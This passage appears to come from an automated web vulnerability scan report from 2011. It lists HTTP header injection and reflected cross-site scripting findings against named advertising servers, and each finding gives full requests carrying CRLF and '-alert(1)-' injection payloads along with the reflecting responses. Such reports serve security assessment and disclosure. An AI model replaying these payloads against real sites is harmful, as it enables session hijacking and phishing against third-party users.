Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq371039301%0d%0aa06bcb1f098&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq371039301
a06bcb1f098
&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002
Content-Length: 0


2.4. http://adserver.adtechus.com/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

The value of the cid request parameter is copied into the Location response header. The payload d0a34%0d%0a5f234eb359e was submitted in the cid parameter. This caused a response containing an injected HTTP header.

Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=d0a34%0d%0a5f234eb359e HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=d0a34
5f234eb359e

Content-Length: 0


2.5. http://adserver.adtechus.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e0895%0d%0abb178f9989d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002&e0895%0d%0abb178f9989d=1 HTTP/1.1
Host: adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002&e0895
bb178f9989d
=1
Content-Length: 0


2.6. http://bidder.mathtag.com/notify [exch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload 487b6%0d%0a27da486a7cd was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=487b6%0d%0a27da486a7cd&id=5aW95q2jLzEvT1RNd05EUm1NREl0T0RJd05DMDBPRFJtTFdGaVkyRXRPRGd6WldZeFlUSXhOVEEyL05HVTJNbU5oWXpVdE16QTVNeTAxTnpnNUxUTXdNV0l0Tm1ZMFpUZG1ZbVl6T1RJeC8yMDgwOTA3OTE4ODY4NTUwMDQvMTM1NzExLzExMzEyNy81L09GYXNVUVR3TGRHYXdaSmsteWsxa3Nfb3llTlZTeXF3Mm9BeUlSMjU2cXcv/GEnH4X2n2EXLZwmAooR9I4CMTOY&price=AAABM1zpWOnT99xyFOkHR-fD82ZTrJ0Z-k7pYw HTTP/1.1
Host: bidder.mathtag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=2
Cookie: ts=1316277341; optout=1

Response

HTTP/1.1 404 Not found
Date: Tue, 01 Nov 2011 02:16:16 GMT
Server: MMBD/3.5.17.1
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - 487b6
27da486a7cd

x-mm-host: pao-bidder-x1
Connection: keep-alive

Request not found

2.7. http://d.adroll.com/pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a5eaf%0d%0a2b3fff9103d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/a5eaf%0d%0a2b3fff9103d/GGBU6EIY6FGOVO4H7YOUOC?pv=45097790706.43637&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://teamsupport.com/
Cookie: __adroll=ff62c573ad7f8079464d155053e20ea5

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 31 Oct 2011 19:40:46 GMT
Connection: keep-alive
Set-Cookie: __adroll=ff62c573ad7f8079464d155053e20ea5; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/a5eaf
2b3fff9103d
/GGBU6EIY6FGOVO4H7YOUOC/VEZ52JWCVBGCRMXILP25YR.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.8. http://d.adroll.com/pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/3LFYGW2GY5AUNBGJEFKFW7/GGBU6EIY6FGOVO4H7YOUOC

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload fe03b%0d%0a0d2db46717e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/3LFYGW2GY5AUNBGJEFKFW7/fe03b%0d%0a0d2db46717e?pv=45097790706.43637&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://teamsupport.com/
Cookie: __adroll=ff62c573ad7f8079464d155053e20ea5

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 31 Oct 2011 19:40:53 GMT
Connection: keep-alive
Set-Cookie: __adroll=ff62c573ad7f8079464d155053e20ea5; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/3LFYGW2GY5AUNBGJEFKFW7/fe03b
0d2db46717e
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3. Cross-site scripting (reflected)
There are 78 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/adj/q1.politico/home_run_of [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8238c'-alert(1)-'538769bc1ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.politico8238c'-alert(1)-'538769bc1ed/home_run_of;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3bb2/3/0/%2a/s%3B228219767%3B0-0%3B1%3B52033249%3B3454-728/90%3B38099114/38116871/1%3B%3B%7Esscs%3D%3f;ord=4779871? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Date: Tue, 01 Nov 2011 01:28:58 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Thu, 01-Dec-2011 01:28:58 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.politico8238c'-alert(1)-'538769bc1ed/home_run_of;sz=728x90;net=q1;ord=4779871;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.2. http://a.collective-media.net/adj/q1.politico/home_run_of [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11e3'-alert(1)-'0e24c47d29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.politico/home_run_ofb11e3'-alert(1)-'0e24c47d29;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3bb2/3/0/%2a/s%3B228219767%3B0-0%3B1%3B52033249%3B3454-728/90%3B38099114/38116871/1%3B%3B%7Esscs%3D%3f;ord=4779871? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Tue, 01 Nov 2011 01:28:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Thu, 01-Dec-2011 01:28:59 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.politico/home_run_ofb11e3'-alert(1)-'0e24c47d29;sz=728x90;net=q1;ord=4779871;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.3. http://a.collective-media.net/adj/q1.politico/home_run_of [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.politico/home_run_of

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6dba'-alert(1)-'acda2ebf641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.politico/home_run_of;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3bb2/3/0/%2a/s%3B228219767%3B0-0%3B1%3B52033249%3B3454-728/90%3B38099114/38116871/1%3B%3B%7Esscs%3D%3f;ord=4779871?&b6dba'-alert(1)-'acda2ebf641=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Date: Tue, 01 Nov 2011 01:28:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Thu, 01-Dec-2011 01:28:57 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.politico/home_run_of;sz=728x90;net=q1;ord=4779871?&b6dba'-alert(1)-'acda2ebf641=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/q1.politico/home_run_of [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.politico/home_run_of

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1b8'-alert(1)-'b862447dec9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.politico/home_run_of;sz=728x90;click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3bb2/3/0/%2a/s%3B228219767%3B0-0%3B1%3B52033249%3B3454-728/90%3B38099114/38116871/1%3B%3B%7Esscs%3D%3f;ord=4779871?1f1b8'-alert(1)-'b862447dec9 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Tue, 01 Nov 2011 01:28:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Thu, 01-Dec-2011 01:28:56 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.politico/home_run_of;sz=728x90;net=q1;ord=4779871?1f1b8'-alert(1)-'b862447dec9;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 870f0'-alert(1)-'681d43366b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj870f0'-alert(1)-'681d43366b4/q1.politico/home_run_of;sz=728x90;net=q1;ord=4779871;ord1=321368;cmpgurl=http%253A//www.politico.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:28:58 GMT
Content-Length: 7318
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30211278520_1320110938","http://ad.doubleclick.net/adj870f0'-alert(1)-'681d43366b4/q1.politico/home_run_of;net=q1;u=,q1-30211278520_1320110938,,polit,;;sz=728x90;net=q1;ord1=321368;cmw=owl;contx=polit;dc=s;btg=;ord=4779871?","728","90",true);</scr'+'ipt>
...[SNIP]...

3.6. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 295a1'-alert(1)-'e04023ad0ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.politico295a1'-alert(1)-'e04023ad0ea/home_run_of;sz=728x90;net=q1;ord=4779871;ord1=321368;cmpgurl=http%253A//www.politico.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:28:58 GMT
Content-Length: 7318
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30106793610_1320110938","http://ad.doubleclick.net/adj/q1.politico295a1'-alert(1)-'e04023ad0ea/home_run_of;net=q1;u=,q1-30106793610_1320110938,,polit,;;sz=728x90;net=q1;ord1=321368;cmw=owl;contx=polit;dc=s;btg=;ord=4779871?","728","90",true);</scr'+'ipt>
...[SNIP]...

3.7. http://a.collective-media.net/cmadj/q1.politico/home_run_of [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.politico/home_run_of

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 407fd'-alert(1)-'75fed897780 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.politico/home_run_of407fd'-alert(1)-'75fed897780;sz=728x90;net=q1;ord=4779871;ord1=321368;cmpgurl=http%253A//www.politico.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:28:59 GMT
Content-Length: 7318
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30315246489_1320110939","http://ad.doubleclick.net/adj/q1.politico/home_run_of407fd'-alert(1)-'75fed897780;net=q1;u=,q1-30315246489_1320110939,,polit,;;sz=728x90;net=q1;ord1=321368;cmw=owl;contx=polit;dc=s;btg=;ord=4779871?","728","90",true);</scr'+'ipt>
...[SNIP]...

3.8. http://a.collective-media.net/cmadj/q1.politico/home_run_of [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.politico/home_run_of

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb6ff'-alert(1)-'c85e9da208c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.politico/home_run_of;sz=fb6ff'-alert(1)-'c85e9da208c HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: dc=sea; optout=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:28:56 GMT
Content-Length: 7303
Connection: close
